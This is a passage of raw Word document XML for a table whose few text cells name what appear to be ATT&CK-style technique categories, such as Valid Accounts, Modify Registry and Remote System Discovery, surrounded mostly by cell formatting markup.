              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10CD3761" w14:textId="763B3766" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BD2335F" w14:textId="7F2E3299" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t xml:space="preserve">Traffic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Signaling</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A0980A7"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199968E7" w14:textId="537C2B7B" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Authentication Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D5A1E6A"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754DA0B2" w14:textId="756D66D2" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E1AC4D9" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23FEA029" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A530AE0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ED5263D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3228DD89" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="6A58A77B" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56D5834A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="581A870C"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0CBBB70C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1869F91D" w14:textId="58C93DE3" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34869864" w14:textId="2A582293" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A90F96A"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16BD1D1E" w14:textId="5D9CE25A" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Cloud Compute Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7012D7EB"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1DF25247" w14:textId="010E6DD8" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Query Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="744B23AA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01A4219B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10A9D9B4" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F11902D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FD5061F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="6392EF66" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="661DF9D1" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2705A27D"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1E376DE7" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F7FFE40" w14:textId="3B58202E" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C49B417" w14:textId="49B58151" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="328EC434"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2A09BD75" w14:textId="66A47A46" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Cloud Resource Hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52B5FEAE"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2AF83680" w14:textId="2198AC25" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Remote System Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F4F8573" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78BF420C" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C55CC2E" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6286EA6F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CDC897A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="08725E0A" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16F7136B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FB0B0E9"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587FA798" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="344D60F7" w14:textId="3ED76212" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="178DA90B" w14:textId="6C8E25AA" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="309ABF26"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BA3D877" w14:textId="4EF3B8A1" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Modify Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17B427E6"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756B4DC9" w14:textId="7910D584" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Software Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="309410CE" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B55812F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A49B373" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="587638A3" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A67BAB4" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="262C5348" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="268E6686" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FFFE1B2"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56823A49" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
